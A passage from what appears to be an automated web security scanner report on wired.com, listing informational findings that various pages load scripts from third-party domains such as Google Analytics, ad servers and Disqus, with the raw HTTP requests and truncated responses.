Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:03:45 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=394
Expires: Wed, 12 Jan 2011 15:46:29 GMT
Date: Wed, 12 Jan 2011 15:39:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.43. http://www.wired.com/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /politics/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 15:46:48 GMT
Date: Wed, 12 Jan 2011 15:36:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.44. http://www.wired.com/rawfile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/rawfile/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://use.typekit.com/ztc8lol.js
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /rawfile/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:25:24 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:56 GMT
Date: Wed, 12 Jan 2011 15:39:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 167807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://use.typekit.com/ztc8lol.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.45. http://www.wired.com/reviews/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+19ed60229e60f2971e8df377934793461f80e3b1+1294844616
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:03:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=462
Expires: Wed, 12 Jan 2011 15:44:31 GMT
Date: Wed, 12 Jan 2011 15:36:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+19ed60229e60f2971e8df377934793461f80e3b1+1294844616"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.46. http://www.wired.com/reviews/%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/%20

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+341c71a9e6631583321c56a6363e335fa32b96af+1294846100
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/%20 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:28:22 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=445
Expires: Wed, 12 Jan 2011 15:44:14 GMT
Date: Wed, 12 Jan 2011 15:36:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+341c71a9e6631583321c56a6363e335fa32b96af+1294846100"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.47. http://www.wired.com/reviews/category/automotive/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/automotive/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+996f2ee0e424f8826829883c1c48da62f4667b81+1294846431
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/automotive/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:33:51 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=477
Expires: Wed, 12 Jan 2011 15:44:49 GMT
Date: Wed, 12 Jan 2011 15:36:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+996f2ee0e424f8826829883c1c48da62f4667b81+1294846431"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.48. http://www.wired.com/reviews/category/desktops-and-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/desktops-and-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+a4b610ab9983549233daed020ecbd113d48ac015+1294843070
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/desktops-and-accessories/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:37:50 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=453
Expires: Wed, 12 Jan 2011 15:44:28 GMT
Date: Wed, 12 Jan 2011 15:36:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+a4b610ab9983549233daed020ecbd113d48ac015+1294843070"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.49. http://www.wired.com/reviews/category/digital-cameras-and-camcorders/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/digital-cameras-and-camcorders/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+e73ce92b91cc87850f4defb338d49d014c7abf20+1294846055
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/digital-cameras-and-camcorders/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:27:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=446
Expires: Wed, 12 Jan 2011 15:44:21 GMT
Date: Wed, 12 Jan 2011 15:36:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+e73ce92b91cc87850f4defb338d49d014c7abf20+1294846055"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.50. http://www.wired.com/reviews/category/gaming-gear/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/gaming-gear/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+bc55cce9b1a8af3a2aaf8f8de044e321e5a7da1a+1294846603
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/gaming-gear/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:36:44 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=424
Expires: Wed, 12 Jan 2011 15:44:01 GMT
Date: Wed, 12 Jan 2011 15:36:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+bc55cce9b1a8af3a2aaf8f8de044e321e5a7da1a+1294846603"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.51. http://www.wired.com/reviews/category/home-audio-and-video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/home-audio-and-video/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+444a62150484244cb53b00a25beec5d3cb07d94d+1294843325
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/home-audio-and-video/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:42:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=393
Expires: Wed, 12 Jan 2011 15:43:30 GMT
Date: Wed, 12 Jan 2011 15:36:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+444a62150484244cb53b00a25beec5d3cb07d94d+1294843325"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.52. http://www.wired.com/reviews/category/household/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/household/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+e5e3f85d40f5cad8c437f0fae504d8638feb65f0+1294843073
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/household/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:37:54 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=463
Expires: Wed, 12 Jan 2011 15:44:41 GMT
Date: Wed, 12 Jan 2011 15:36:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+e5e3f85d40f5cad8c437f0fae504d8638feb65f0+1294843073"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.53. http://www.wired.com/reviews/category/media-players/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/media-players/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+bf6b9a5ec231191dfcb33e30e8f2f60ef546df09+1294843330
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/media-players/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:42:11 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=453
Expires: Wed, 12 Jan 2011 15:45:02 GMT
Date: Wed, 12 Jan 2011 15:37:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+bf6b9a5ec231191dfcb33e30e8f2f60ef546df09+1294843330"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.54. http://www.wired.com/reviews/category/mobile-audio/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/mobile-audio/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+f903d00cb4002020d74f2b08e092ab0f7523b7ff+1294846660
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/mobile-audio/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/reviews/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 10:37:41 -0500
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:45:41 GMT
Date: Wed, 12 Jan 2011 15:37:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+f903d00cb4002020d74f2b08e092ab0f7523b7ff+1294846660"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.55. http://www.wired.com/reviews/category/mobile-phones/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/mobile-phones/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+5adfe3154fe6860740d960e4d28725c620795551+1294845355
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/mobile-phones/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:15:55 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=476
Expires: Wed, 12 Jan 2011 15:45:37 GMT
Date: Wed, 12 Jan 2011 15:37:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

